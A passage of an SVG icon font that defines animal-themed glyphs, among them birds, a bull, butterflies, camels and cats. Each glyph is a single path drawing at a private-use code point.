<glyph glyph-name="bird" horiz-adv-x="1000" unicode="&#xe82f;" d="M938 611v-14c-4-11-5-23-9-34-16-41-44-72-79-97-44-32-93-53-146-69-4-1-9-3-16-5 17-1 31 0 44 3 49 7 92 27 132 55 17 12 33 25 50 37 2 2 6 4 9 2 2-2 1-5 0-8-3-12-7-25-11-37-8-31-25-57-52-76-43-28-89-34-138-29-12 1-24 3-38 5 3-2 4-3 5-3 32-14 65-19 99-15 17 2 34 5 52 8 7 1 10-2 6-8-11-16-23-31-39-39-35-20-72-20-107-1-10 5-18 12-27 18 9-20 24-34 43-43 9-5 20-9 29-13 2-1 4-1 5-4 0-2-2-3-4-4-8-4-15-9-23-12-19-6-37-5-54 7-10 7-14 18-20 28-3-3-1-6-1-9 1-8 5-16 9-24 12-21 9-26-13-32-18-5-33 2-40 19-1 2 0 4-3 4-2-8 3-15 6-22 2-6 0-9-5-11-4-2-7-2-11-3-7-1-14 0-21-4 4-6 9-10 14-14 15-12 30-25 45-37 5-4 5-6 1-10-9-8-19-12-31-13-12-1-25-2-35-11-6-6-14-8-22-8-13 0-24-6-37-7h-17c-8 2-17 6-25 7-13 0-25 4-35 13-4 3-8 4-13 4-18-2-33 5-46 16-3 4-3 5 1 8 10 8 20 16 30 24 10 9 21 17 30 29-8 1-15 1-21 2-15 3-17 7-12 21 2 6 4 11 1 19-9-29-34-32-53-23-9 5-11 10-7 20 3 7 7 14 10 21 3 6 6 14 3 23-3-6-6-10-8-14-10-18-25-26-45-26-16-1-29 6-42 14-3 1-6 2-6 6 0 3 4 3 7 4 15 6 31 12 44 23 11 9 21 19 27 33-2-1-2-1-2-1-1-1-3-2-4-3-20-16-42-26-67-28-42-4-72 15-97 47-2 3-8 8-5 12 3 4 9 2 14 1 31-6 63-11 95-6 18 3 36 8 54 17-3 0-5 0-6 0-21-5-43-7-64-7-39 1-76 10-108 33-14 10-28 21-35 37-12 23-20 49-26 75-1 3-2 5 0 7 3 2 6 0 8-1 7-5 14-10 20-15 46-35 95-65 153-77 19-3 41-5 52-3-3 1-6 2-9 3-62 18-122 44-172 87-25 22-46 48-57 80-5 11-6 23-10 34v14c2 1 4 2 5 3 4 7 11 6 17 3l5-2c25-12 45-30 65-47 62-54 129-95 210-112 16-4 22-15 19-32-2-13-5-27-9-40-7-27-12-54-4-81 10-36 36-56 70-69 0 4-2 6-3 9-21 38-33 79-26 123 3 20 9 37 23 52 4 3 6 3 9-1 6-9 15-15 25-18 9-2 16-7 22-14 7-9 11-18 16-29 3 6 5 10 7 15 7 14 17 25 33 29 10 2 18 8 24 16 3 5 5 4 9 0 16-21 23-45 25-71 1-24-5-46-13-68-5-14-12-28-20-43 50 21 73 72 64 123-3 23-12 44-16 67s2 31 25 36c28 6 55 15 81 27 44 20 83 49 120 80 21 17 40 35 65 47 11 5 20 8 28-3z m-488-171c5 0 7-6 12-7-1 8-2 14-6 20-3 5-2 9 1 13 13 18 32 21 53 19 15-2 28-9 35-24 2-4 2-7 0-10-4-6-6-13-7-21l11 8c1-9-5-21-11-24-3-2-6-2-9 0l-10 8c-12 8-26 8-38 0l0-1c-6-3-11-12-19-7-8 6-13 15-12 26z" />
<glyph glyph-name="birds" horiz-adv-x="1000" unicode="&#xe830;" d="M428 270c-3-1-6 1-7 4-38 107-154 165-262 130-39-12-71-34-95-62-2-2-2-5 0-7s3-3 6-2l2 1c125 40 259-27 302-151 1-3 4-4 8-3 125 36 257-34 297-159 0-1 0-2 1-3 0-2 3-4 5-4 3 0 5 2 5 4 9 37 9 76-4 114-34 108-149 169-258 138z m200 180c-3-1-6 1-7 4-34 94-136 145-231 114-34-10-62-30-84-55-1-1-1-4 0-6 1-1 3-2 6-1 0 0 1 0 2 0 110 35 228-24 266-132 1-3 4-4 6-4 111 32 227-29 262-139l1-3c1-2 3-3 5-3 2 0 4 1 4 3 8 32 7 67-3 100-31 96-132 149-227 122z m304 66c-21 65-90 102-156 83-2 0-4 1-4 3-23 64-93 99-158 78-23-7-42-21-57-38-1-1-1-2 0-4 0-1 2-1 3-1 1 0 1 1 2 1 75 24 156-17 182-91 0-2 2-3 4-2 76 22 155-20 179-96 0 0 1-1 1-1 0-2 2-3 3-3 2 0 3 1 3 3 5 22 5 45-2 68z" />
<glyph glyph-name="bone" horiz-adv-x="1000" unicode="&#xe831;" d="M502 278c80 0 160-8 237-32 12-4 21-8 29-19 30-43 88-52 130-22 42 30 53 88 22 131-8 10-8 17-1 28 32 44 21 102-22 131-43 30-100 20-131-24-5-7-10-12-18-14-40-14-82-22-124-28-74-9-149-10-223-3-50 5-100 14-148 30-8 3-14 7-19 14-31 45-90 56-133 24-45-34-51-94-14-138 5-6 4-9-1-14-3-3-7-6-9-10-27-43-15-100 27-128 41-28 98-20 127 21 8 12 18 17 31 22 78 24 159 31 240 31z" />
<glyph glyph-name="bull" horiz-adv-x="1000" unicode="&#xe832;" d="M913 637c-5 3-12 7-11 13 4 29-17 27-34 27-8 1-15 0-23 3-24 10-49 10-74 5-31-5-54-21-64-51-10-30 0-55 22-76 12-11 24-22 31-36 12-24 7-46-17-68-27-26-32-27-61-9-48 31-90 68-122 116-20 29-40 59-59 89-20 30-47 40-82 34-55-9-110-22-163-39-26-8-44-10-67 12-30 30-92 27-117 0 13 0 26 1 38 0 22-3 44-9 51-32 6-22 15-33 43-31-20-16-33-16-43 2-20 33-64 41-98 15 26-4 57 7 75-23-17-9-18-10-16-14 14-21 6-40-3-60-2-4-4-11-2-15 15-26 7-50-4-74-7-15 2-16 12-16 4 10 12 18 21 10 10-8 22-8 32-14 36-6 37-5 43 28 6-26 7-28 16-24 36 13 49 49 29 82-4 8-9 15-13 22 24-9 34-28 36-51 1-6-3-16 5-18 23-6 15-26 13-37-3-14-3-29-11-42-6-10-3-18 11-17-3-2-6-5-8-5-22 6-23-12-28-24-6-16 7-21 16-27 24-17 53-27 66-57 4-8 12-19 27-11 20 11 27 34 15 53-4 5-6 11-5 17 2 11-4 12-13 12-7 0-15 1-22 3-11 3-19 10-19 21 0 11 11 12 19 14 44 11 70 41 83 83 3 12 3 25 13 37 6-35-6-63-22-89-14-21-13-23 13-25 17-1 34 0 50-7 16-8 23-5 29 12 7 23 22 40 50 42-2-9-8-12-12-16-41-44-42-120-1-163 40-43 40-93-1-134-3-3-6-6-8-9-11-13-23-27-16-43 7-14 25-9 39-10 21-2 32 5 30 28-1 18 9 34 23 43 15 9 30 14 14 36-4 4-5 18 3 23 8 4 13-6 18-11 20-18 19-42 15-66-2-13-6-26-9-39-4-15 2-23 17-24 57-3 69-4 49 56-7 23-9 48 18 65 7 4 12 13 10 23-28-6-54 5-66 27-12 24 4 38 17 54 5 6 11 12 18 18 34 33 40 74 23 116-9 21-6 30 11 43 55 47 57 91 7 145-8 9-17 19-24 30-16 26-5 55 24 65 17 7 35 7 52 6 13 0 23-3 26-18 3-13 11-24 24-27 22-6 43-14 65-30-4 23-7 40-24 52z m-744-154c-10-2-11 8-10 13 0 8 4 18 13 20 9 1 10-9 12-16 0-11-5-16-15-17z m158-132c-2-9-12-3-19-3 25 13 6 37 17 58 6-20 5-38 2-55z m-41-74c-34 23-35 26-16 68-21-14-31-31-43-46-14-16-10-27 8-38 18-11 38-21 45-45 4-12 10-27 28-16 15 10 32 18 20 41-9 19-27 25-42 36z m-108 127h1c0 0-1 1-1 1h0c0 0 0-1 0-1z m-16 0c-8-3-14-10-12-19 1-9 8-13 16-12 9 0 15 6 16 15 1 6 0 11-4 16-5 0-11 1-16 0z m-37 4l0 1 0 0h0l0-1c0 0 0 0 0 0z m-9-12c4-6 12-10 20-7 6 2 7 9 6 15-2 13-11 3-17 4-3-5-16-3-9-12z" />
<glyph glyph-name="butterfly-alt" horiz-adv-x="1000" unicode="&#xe833;" d="M446 468c9 18 21 32 36 38-40 140-124 229-128 233-9 9-23 9-31 1s-9-23-1-31c1-1 91-97 124-241z m-76-229c13 0 26 4 37 10 1 40 5 105 18 161-40 118-152 202-284 202-43 0-78-35-78-78v-107c0-104 84-188 188-188h119v0z m-208 179c-7 21-6 39 3 51 13 19 44 26 67 26 39 0 71-37 71-81 0-60-11-81-40-81-27 0-77 11-101 85z m392 50c33 144 123 240 124 241 8 9 8 22-1 31-8 8-22 8-31-1-4-4-88-93-128-233 15-6 27-20 36-38z m-197-255h-113c-38 0-69-30-69-68 0-105 86-191 191-191 35 0 63 28 63 64v1c-16 58-21 131-22 174-13 13-30 20-50 20z m-1-145c0-15-12-27-27-27-44 0-80 36-80 81 0 15 13 29 29 29h48c8 0 15-4 21-9 0-18 2-49 9-74l0 0z m503 545c-132 0-244-85-284-203 13-56 17-121 18-160 11-7 24-11 37-11h119c104 0 189 84 189 188v107c0 43-36 79-79 79z m-21-195c-24-74-73-85-101-85-29 0-39 21-39 81 0 44 31 81 70 81 24 0 54-7 67-26 9-13 10-30 3-51z m-338 63c-35 0-64-116-64-259s29-260 64-260c36 0 64 116 64 260s-29 259-64 259z m256-268h-113c-19 0-37-7-50-20-1-43-6-116-22-174v-1c0-35 28-64 63-64 105 0 191 86 191 191 0 38-31 68-69 68z m-85-172c-15 0-27 12-27 27v0c7 25 9 56 9 74 6 5 13 9 21 9h48c16 0 29-13 29-29 0-45-36-81-80-81z" />
<glyph glyph-name="butterfly" horiz-adv-x="1000" unicode="&#xe834;" d="M937 623c-6 19-36 30-68 34-40 4-90-5-134-23-34-14-65-31-97-56-50-40-76-71-90-89-11-14-13-31-23-38 0 4 1 14-5 17-2 2-5 3-7 4 3 10 15 58 35 86 25 33 52 52 56 55 4 2 9 2 12 4 2 2 3 8 2 9-4 2-10-3-13-7-3-3-39-28-60-59-21-30-33-77-36-86-3 2-7 4-9 4-2 0-5-1-8-3-3 10-15 56-35 85-22 32-57 56-61 59-3 4-8 9-13 7-1-1 1-7 3-9 3-2 8-2 12-4 3-3 31-21 55-55 20-27 32-74 35-85-3-2-5-3-7-5-7-3-6-13-6-17-9 5-16 26-29 45-14 21-34 42-84 82-32 25-63 42-97 56-44 18-94 26-134 22-32-3-62-15-68-33-4-15 15-59 34-85 13-20 16-42 21-64 8-32 21-79 56-90 33-11 97 8 97 8s1-11-20-20c-22-9-35-23-47-47-12-22-21-51-21-64 0-20 5-27 4-37-1-11 3-23 11-31 9-10 6-18 10-29 3-10 17-18 17-18s-2-22 14-36c13-12 28-20 37-28 10-9 17-15 38-19 12-3 19-22 44-21 27 2 27 1 45 8 28 11 40 65 52 117 9 41 16 67 29 75-4-24 1-63 1-63s-3-21 0-24c-2-11 2-25 3-25 1-8 6-24 12-24s11 16 11 24c2 0 5 14 4 25 3 3-1 24-1 24s5 37 2 64c11-6 20-35 29-76 12-52 24-106 52-117 18-7 17 0 45-2 25-1 32 23 44 25 21 4 28 11 38 19 9 9 24 16 37 28 15 15 14 37 14 37s14 8 17 17c4 11 1 19 10 29 8 9 12 20 11 32-1 9 4 16 4 36 0 13-9 32-21 54-13 24-25 38-47 47-21 9-20 20-20 20s64-19 97-8c35 11 48 58 56 90 5 22 8 44 21 64 19 26 38 71 34 85z" />
<glyph glyph-name="camel-alt" horiz-adv-x="1000" unicode="&#xe835;" d="M62 460v6c17 16 38 24 60 29 38 9 66 30 89 59 18 23 30 50 50 73 4 4 5 10 7 15 6 18 6 37 8 56 2 17 5 35 16 49 6 8 14 11 23 14 25 7 40 3 57-1 22-6 36-17 37-37 0-7 0-13 0-19 2-17 11-25 30-26 17-1 28 7 36 19l21 40c10 18 27 29 49 33 25 4 32 4 51-8 28-7 40-28 38-54 0-9-6-17-4-25 7-46 20-90 47-129 5-8 10-16 20-22 0 7 0 13-2 19-6 22 0 41 14 59 29 36 69 56 116 64 35 6 48-15 37-39-3-5-1-7 5-9 11-3 23-7 34-12 12-6 24-13 31-24 8-14 7-27-3-36-11-10-28-12-42-4-6 4-8 1-10-3-5-10-4-20-5-31-2-30-5-59-4-89 1-47-8-91-34-132-20-30-45-53-84-60-30-5-58 3-71 31-1 1-2 2-4 2 0-16-10-27-24-35-26-14-37-34-35-61 0-11-3-20-12-28-11-10-15-23-16-37-1-28 1-57 5-85 3-25 16-44 41-56 9-4 17-12 24-19 7-7 8-13 0-20h-25c-12 5-24 1-37 3-28 3-35 9-29 31 1 5 0 6-6 6-9-1-19-4-28-1-9 2-13 6-10 14 2 7 4 14 5 21 2 28 4 57 18 83 11 21 13 43 6 66-4 13-10 25-9 38 1 13-5 21-16 27-16 9-25 22-29 38-5 16-7 32-6 48 0 6-1 9-8 10-41 6-81 16-117 38-7-32-20-61-29-92-7-25-12-51-7-77 8-46 23-89 56-126 15-16 35-28 54-40 7-5 16-11 13-21-4-10-15-10-25-10-17 0-34 1-51 2-10 1-13 7-11 15 4 14-1 26-9 38-21 30-34 63-48 96-9 21-13 43-26 62-12 18-13 35-4 54 7 15 9 31 9 48 0 21-3 42-5 63-2 10-1 20-5 30-4-2-4-4-5-6-10-29-21-57-28-86-6-25-17-49-16-75 1-18 0-36-5-54-3-10-2-21-2-31 1-22 3-43 4-64 0-2-1-5 2-7 16-6 17-20 19-32 2-11 7-20 18-26 5-3 10-6 14-11 8-10 5-18-9-21-13-4-27-2-40 1-13 3-18 8-18 20-1 10 1 20-3 29-6 18-7 36-4 54 4 24 5 48-5 71-11 28-11 58-9 87 2 22 1 43-2 64-4 35-10 70-9 105 1 18 3 36 3 54 1 10 1 21 1 32-18-13-35-23-57-22-5 1-10-3-14-7-6-5-11-10-17-16-4-5-9-9-15-11-4-2-9-2-9 3 1 9-6 13-11 18z" />
<glyph glyph-name="camel-head" horiz-adv-x="1000" unicode="&#xe836;" d="M783 721c5-3 12 1 17-4-6-1-11-1-18-3 12-4 23-6 35-12-11 0-20 0-30-3 6-3 11-7 17-10-1-1-1-1-1-1-15-2-15-2-14-16 0-5 0-11 0-17 3 2 3 6 7 9 1-19-1-37-13-52-4-5-3-7 2-10 55-38 100-86 137-141 1-1 2-3 2-4 0 0 0 0 0-1-9 7-17 15-28 22 7-14 14-25 19-39-6 5-10 9-17 10 13-18 23-37 30-57 15-46 11-93-1-138-5-21-12-41-21-60 0-2-1-4-4-6 0 36-3 70-10 105-4-3-5-7-6-10-18-38-37-75-64-108-43-52-98-84-164-101-6-2-13-3-20-4 65 31 118 75 151 141-12-13-24-26-38-38-13-13-28-23-43-33-15-10-31-19-49-25 43 37 81 78 95 136-11-17-21-33-37-45-5-3-9-7-16-9 4 5 6 8 8 11 24 34 42 70 49 111 7 42-2 80-26 117-18-33-38-62-69-82 13 21 25 43 32 68-44-70-106-117-187-141 7-3 13-3 23 0 9 2 17 5 24 9 28 16 54 33 84 45 26 9 53 14 81 16-33-11-65-25-95-43-29-19-56-40-79-66 30 17 59 34 94 39-24-14-45-32-63-55-12-14-22-29-30-45 8 6 16 13 28 17-24-35-40-71-35-113 4-41 26-75 51-106-37 21-64 52-87 90-3-16 3-29 7-44-18 18-30 37-40 58-10 21-17 44-22 67-4-4-5-9-6-14-2-4-2-9-3-15-12 33-13 88 22 147-18-5-36-4-55 0 14 7 28 13 36 27-31-19-65-29-101-25 24 12 52 20 66 46-23-16-49-20-78-18 8 5 15 9 20 14 6 7 12 13 13 22 2 9-3 16-12 17-16 2-31 5-46 11-21 8-41 4-61-5-15-7-30-15-43-24-14-8-28-11-42-13-22-3-43-4-65 1-27 5-36 22-24 47 3 7 7 13 11 20-7 2-13 3-17 10-3 6-1 13-1 20 4 27 15 50 35 68 2 2 3 5 4 7 17 51 56 75 107 82 26 4 53 2 79 8 22 5 43 13 63 25 12 6 22 18 33 27 23 19 48 33 79 31 11-1 19 2 28 8 19 12 41 17 64 18 34 2 67-4 98-15 5-2 9-2 12 2 23 21 49 38 81 41 1 1 1 1 1 1h36z m-379-327c0-4-1-6-1-8-4-20 4-32 23-38 2 0 5-1 8-1 33-5 63 3 91 22 2 1 4 3 8 3-5-9-12-16-21-24 31 12 49 34 68 56-4-17-13-32-22-48 45 14 73 46 100 81-16-38-42-68-73-94 14 6 27 14 39 23 37 28 65 98 33 151-9 15-17 29-27 42-15 19-31 37-48 55 21-7 40-16 59-25-19 22-43 36-69 51 20-3 37-9 54-14-18 16-39 27-61 38 18-1 35-7 54-13-9 8-17 12-24 17 4 0 8-1 13-3 13-4 25-11 37-17 3-1 6-5 8-2 2 3-2 6-4 8-6 6-14 10-23 14-15 7-32 11-49 12-29 3-57-1-81-17-12-8-12-8-4-19 0 0 0-1-1-1-47 23-88-4-108-30 18 11 34 22 53 25-1-3-4-3-6-5-16-11-31-24-40-42-2-4-1-6 4-6 7 0 14 1 21 4 11 4 22 3 34-1 11-3 22-10 32-16 9-5 19-8 32-6-12 5-23 9-32 17 8-1 16-4 23-5 3 0 7-2 9 2 1 3-3 5-5 7-12 10-26 17-41 21-8 1-15 2-24 3 13 5 24 6 36 3 16-3 30-12 43-20 13-8 24-17 38-22 4-1 3-3 3-6-4-18-12-32-24-46-21-23-49-29-78-31-22-1-43 5-64 9-34 6-67 12-102 11-1 0-2 0-1 1 23 9 55 13 78 10 21-2 41-5 61-8 15-1 31 1 45 8 11 6 21 18 22 27-41-40-77-32-96-6 12-8 23-13 35-14 13-1 24 2 35 12-4 0-5 0-6-1-29-4-53 2-67 29-2 3-5 4-8 5-20 4-40 1-60-3-20-3-40-7-63-5 17 3 31 5 44 8 15 3 29 7 41 14 2 1 5 3 4 6-1 2-4 2-6 1-6-1-12-3-17-4-27-7-52-16-80-18-18-1-35-1-52-5-41-11-74-30-80-77 0-4-3-5-6-6-15-11-28-24-35-42-4-9-5-18 1-28 3 13 5 24 13 33-1-8-1-15-1-23 0-16 5-21 21-22 24-1 48 3 72 10 22 6 43 16 60 33 8 7 8 12-1 19-4 2-8 4-14 7 14 2 26 2 37-5 7-5 14-11 21-18 12-13 22-28 38-37-5 0-10 1-15 2-14 5-26 3-37-8-9-9-21-14-33-18 11 8 22 16 28 28 4 6 10 12 6 18-5 6-14 4-21 2-12-3-23-9-33-16-18-11-37-18-58-22-20-4-42-6-52-30-3 8 1 14 3 21-12-6-13-17-18-27-1 8-1 16-3 23-5-3-7-7-9-12-7-19 10-38 32-37 22 1 42 9 61 18 7 3 13 6 20 9-10-12-22-20-35-28 4 0 7 0 10 1 19 3 35 12 49 24 22 16 45 22 72 20 20-1 41 1 60 11 5 3 11 6 17 10 0-7-6-11-7-17 14 0 25 5 37 12z m353 282c0-1 0-1 0-2-1-2-2-4-3-6-15-29-25-59-23-92 0-4 0-8 4-9 4-1 6 3 8 6 20 30 31 63 31 99-1 25-5 28-28 20-28-9-44-28-49-58 5 7 7 13 13 17-3-14-3-17 0-27 5 14 9 29 20 40-4-10-7-21-7-32 5 8 8 16 14 24 5 7 11 15 20 20z m-301-356h-12c-6 0-12 5-16 3-5-2-4-10-7-15-2-1-3-3-4-5-4-5-8-8-12-13 18 6 35 14 51 30z m233 350c-13-10-22-20-28-32-1-2-4-4 0-6 6-3 11-9 15-16 1 10 2 19 4 28 1 8 4 16 9 26z m-319-354c12 3 23 8 32 17-8 3-13 8-19 14-1-13-6-22-13-31z m65 243c-3 6-4 11-5 16-1 7-7 3-10 4-5 0-3-4-3-6 3-8 9-12 18-14z m-69-125c24-11 49-17 76-15-14 7-28 12-41 22 30-7 59-9 89 0-15 3-30 8-44 17 43-1 56 0 71 10-8 0-15-1-22 0-7 1-14 2-22 7 63 10 100 43 99 109 6-17 9-34 9-52-1-25-6-50-18-72-30-59-92-81-152-54-10 4-19 9-27 15-6 4-12 9-18 13z m-227 61c5 20 15 34 28 46 10 9 22 10 35 8 8-1 12-6 14-14 2-11-2-20-10-25-6-3-12-5-19-4-17 1-33 0-48-11z m38 21c9-1 16-1 23 2 3 1 8 2 7 6-2 5-7 3-10 2-7-1-13-5-20-10z m23 43c15-1 27-4 37-15 11-12 11-27 0-39-11-11-25-16-40-17-13-2-26-1-38-2-19-2-34-11-48-22 12 17 28 28 50 28 11 1 23 0 34 4 10 3 19 7 25 15 13 15 9 34-9 42-3 2-7 3-11 6z m168 1c12-16 25-27 41-37-24-1-32 6-41 37z m8-31c-21 0-17-4-23 13-3 6-4 12-5 18 8-11 17-22 28-31z" />
<glyph glyph-name="camel" horiz-adv-x="1000" unicode="&#xe837;" d="M920 252c-22 11-34 38-29 63 6 27 8 55 1 82-1 8-4 14-6 19-3-27-5-56-8-84-3-27 1-51 18-73 4-6 8-13 13-18 24-25 27-56 24-88-3-31-4-61-6-92 0-14 0-28 8-41 7-11 0-24-13-26-18-2-36-1-54 0-9 0-11 7-6 14 3 3 5 7 8 9 21 10 26 29 27 49 2 34 1 68 1 102 0 15-8 28-20 37-7 5-13 11-21 15-24 14-46 31-59 57-1 3-3 5-5 8-15-15-20-32-13-51 1-5 2-10 5-14 10-20 10-39-9-55-3-2-5-6-6-9-11-38-32-72-37-111-2-12-4-25-18-29-17-6-34-4-50 5-7 5-5 11 0 15 6 5 13 10 20 14 17 13 29 28 35 49 7 24 17 47 25 70 5 17 3 35-8 50-19 25-25 53-21 84 1 0 1 1 1 1 2 30-2 33-31 27-28-6-56-12-85-15-14-2-30 0-45 3-31 6-40-8-38-36 0-13 0-27 0-40-2-39-5-79-6-118 0-24 2-48 3-72 0-28-21-43-48-36-9 3-13 9-9 19 2 4 4 9 8 13 18 20 21 44 17 69-5 35-9 70-14 104-1 11-4 21-5 32l-4 0c-2-12-3-24-5-35-7-34-15-67-22-101-5-28-9-56-13-84-2-20-8-26-29-28-8 0-17 0-26 1-15 2-19 10-9 22 3 4 9 8 14 10 27 12 34 34 34 60 0 28 0 56 0 84 1 17 6 33 5 50 0 21-3 43-5 64-2 32-16 45-47 44-33-1-64 2-89 27-35 36-62 78-75 127-8 27-11 56-17 84-2 9-8 19-15 24-20 14-43 21-69 18-20-3-32 8-29 25 1 4 4 9 7 11 45 17 80 37 125 44 4 0 10 0 14 2 16 5 29 6 38-11 1-3 7-4 11-6 4-2 9-3 10-6 1-3-2-9-5-10-9-5-7-12-5-21 8-30 15-61 22-91 7-27 19-49 43-65 18-13 31-13 48 2 33 30 65 60 98 89 30 27 70 72 110 82 53 13 102-8 127-60 31-37 69-66 113-84 28-12 47-31 60-58 7-15 14-30 22-45 11-22 13-45 9-69-2-20-3-39 5-58 4-11 3-25 5-40z" />
<glyph glyph-name="cat-alt-1" horiz-adv-x="1000" unicode="&#xe838;" d="M913 122c-20 1-40 2-60 4-46 4-92 8-142 22 9 7 16 11 21 16 35 46 45 85-8 125-2 1-4 3-6 4-20 20-16 38 10 47 13 5 27 8 41 12 18 6 27 21 31 37 4 18-16 15-25 22-6 4-12 7-16 12-18 24-43 31-71 31-14 0-25 4-37 12-16 12-38 31-55 19-18-12-6-39-1-59 2-9 8-17 2-28-11-18-8-37-1-56 4-11 9-22 15-32 11-17-7-20-13-29-8-12-12-2-19 1-40 15-75 40-115 54-49 16-95 18-143-1-28-12-45-34-58-56-20-34-27-74-26-114 1-17-5-20-20-19-53 5-93 39-98 86-6 57 30 112 79 128 53 18 107 24 163 25 44 1 89 4 130 24 66 33 88 105 47 159-42 58-145 62-192 8-17-19-27-42-26-69 0-10-2-24 12-26 13-3 15 10 19 19 3 7 5 13 7 19 11 25 30 41 55 49 53 18 104-20 95-71-5-28-33-52-69-58-60-10-122-5-183-15-85-15-157-47-186-138-26-80 17-156 100-175 21-4 41-6 63-5 7 0 15 2 20-6 8-12 21-13 34-13 62 0 124-1 187 1 12 0 35-7 31 22 0 1 7 5 10 6 28 5 55 8 83 1 7-2 13-3 17-10 8-16 23-18 38-19 87-3 175-3 262 0 8 1 23-3 22 13-1 13-10 20-24 21z" />
<glyph glyph-name="cat-alt-2" horiz-adv-x="1000" unicode="&#xe839;" d="M737 333c-46 2-88-10-114-52-22-36-22-74-2-112 18-33 63-58 95-53 8 1 18 2 21 12 3 11-7 15-15 19-12 7-25 12-37 20-23 15-30 37-24 63 6 26 25 40 51 43 46 5 86-23 99-72 17-64-15-134-80-179-107-74-272-64-397 5 11 8 23 3 35 4 38 1 76 2 114 3 8 1 19 0 21 12 1 9-2 17-8 24-7 10-18 11-29 12-20 2-40 3-64 5 13 23 24 42 36 62 18 29 28 61 16 93-10 28 2 34 22 38 7-76 35-142 69-207 17-34 43-44 77-41 11 1 30-5 30 15 0 17-9 29-28 30-24 1-34 14-38 37-2 19-7 38-11 57-16 69-4 126 57 170 26 19 38 50 48 80 12 35 9 67-18 94-9 10-17 20-25 30-24 31-17 49 21 58 11 3 23 3 35 7 24 7 38 26 44 48 5 23-21 21-32 30-7 5-15 10-20 17-14 20-34 32-58 32-44 1-81 15-117 40-10 6-24 16-36 7-12-9-9-26-7-40 5-22 19-48 12-66-21-56-2-100 28-142-36-34-64-14-94 4-29 18-61 29-96 32-80 6-149-47-181-137-61-174 27-390 193-470 98-48 202-63 309-46 113 19 196 79 233 190 37 112-28 218-135 224z" />
<glyph glyph-name="cat-alt-3" horiz-adv-x="1000" unicode="&#xe83a;" d="M627 280c-33 16-59 39-76 71-12 21-21 44-23 68-3 41-2 82 11 121 5 16 11 32 22 45 5 6 8 8 13-1 14-22 29-43 42-65 6-8 10-9 20-7 23 6 47 11 72 4 9-3 19-2 28-6 6-2 10 4 14 8 18 19 36 38 55 57 3 3 5 10 11 7 5-2 3-8 4-12 5-43 10-86 8-128-2-47-13-92-47-126-20-19-42-33-68-39-17-5-19-9-22-26-4-24-10-47-16-70-6-26-13-52-19-79-5-24-13-48-18-73-5-25-12-49-21-73-5-13-10-26-20-36-13-12-24-8-30 9-4 12-4 24-4 37-2 42 4 83 4 125 1 15-2 30-8 44-5 9-12 15-24 15-11 0-17-5-23-14-10-18-14-37-18-57-9-45-15-91-26-136-2-8-6-15-10-22-2-4-7-8-13-7-5 0-9 4-11 9-8 16-11 32-13 49-4 33-10 66-13 99-3 29-5 58-9 87-2 14-5 29-12 42-6 11-14 18-26 17-13-1-17-12-20-22-10-29-13-59-15-90-2-41-5-81-7-122-1-20 0-42-12-60-8-13-19-14-28-2-9 12-14 26-18 41-5 21-11 43-16 64-5 18-10 36-14 54-5 25-11 50-16 75-3 13-6 27-8 40-4 23-9 46-12 69-8 54-15 108-1 162 4 17 10 34 19 50 2 4 3 6-1 11-30 30-39 69-40 111-3 80 45 139 108 168 45 21 93 25 141 18 40-6 72-28 97-60 9-11 18-21 17-36-1-10-2-18-12-23-10-5-16 1-22 5-14 10-26 23-41 31-27 17-58 19-88 16-47-4-77-33-95-74-12-26-12-53 0-80 5-13 9-14 20-6 32 23 68 34 107 29 20-2 40-6 58-13 7-2 9-7 7-13-11-39-12-79-10-119 4-61 31-109 86-139 22-13 46-19 71-24 3-1 7-2 11 2z" />
<glyph glyph-name="cat-dog" horiz-adv-x="1000" unicode="&#xe83b;" d="M671 122c10-16 13-36 11-56-1-11-5-19-17-21-6-1-12-4-17 1-5 6 0 12 3 17 13 26 6 49-21 60-22 10-44 20-58 42-3 5-8 9-13 8-7-2-7-9-8-14-1-8-1-17-1-26-1-32-18-57-39-79-5-5-12-8-19-8-9 1-14 6-8 15 5 7 10 14 16 20 19 19 10 39 2 59-7 19-21 26-40 24-11-1-22 0-33-3-26-8-32-21-20-45 8-16 17-33 17-52 0-16-14-25-30-20-7 3-10 9-3 14 11 8 10 18 4 27-12 17-25 35-37 52-5 6-13 8-20 8-26 0-51-3-76-11-17-6-28-17-29-36 0-4 0-8-3-12-3-3-6-7-10-6-7 1-5 6-5 10-2 32 12 54 40 71 28 16 37 43 26 71-5 12-12 20-27 17-8-2-17-2-25-1-16 3-22 16-16 30 6 15 10 31 29 36 11 2 2 14 8 21 13-3 20-14 30-22 8-7 15-15 24-22 29-22 59-26 92-7 44 26 92 39 140 21 30-11 53-15 82 2 26 15 53-2 76-17 23-15 45-32 69-46 33-19 65-6 76 30 6 18 3 35-10 48-15 13-33 18-53 14-10-3-17-10-19-21 2 0 3-1 4-1 12-2 24-4 22-20-1-11-21-19-33-16-28 8-37 45-18 68 17 20 62 26 96 13 31-12 49-37 48-67 0-59-61-99-116-79-27 10-50 26-72 43-10 8-20 16-32 21-13 6-26 8-39 2-20-9-21-19-12-38 19-41 39-81 64-119z m-435 237c1 6 7 0 10-2 23-12 41-29 59-46 32-27 56-33 96-11 54 31 112 35 170 8 8-5 14-3 22 2 25 16 52 20 80 8 13-5 25-12 40-20-8 40 10 65 45 78-18 27-41 46-69 60-59 30-122 36-185 28-79-10-152-3-212 53-31 28-62 57-70 102-3 14-11 27-20 38h-4c-7-13-13-26-13-41 0-11-5-14-14-17-20-5-39-14-44-35-3-14-12-20-22-26-10-5-20-10-30-13-16-4-15-12-7-22 15-19 36-26 59-26 13 1 21-4 27-15 21-37 45-71 72-104 2-2 6-15 10 1z m551-93c8-5 18-18 30-7 12 12 16 28 10 44-7 16-23 18-38 19 12-14 16-28 5-44-2-4-14-7-7-12z m26-82c-4 5-7 8-14 8-29 0-56 10-79 26-21 14-40 28-60 42-10 7-20 12-33 7-10-4-14-8-7-20 15-27 37-45 63-59 25-13 36-34 36-61-1-14-1-29-19-34-6-2-6-29-1-32 10-5 43 9 46 21 9 33 17 66 6 106 30-24 53-48 70-77 9-17 6-23-12-30-9-3-13-9-12-16 1-9 8-8 14-8 14-1 27 0 40 3 22 4 28 16 16 35-17 30-36 59-54 89z m115 89c-9 3-17 7-25 10-6 2-11 3-12-6-1-13-6-24-13-36 21-2 45 17 60 28l-10 4z" />
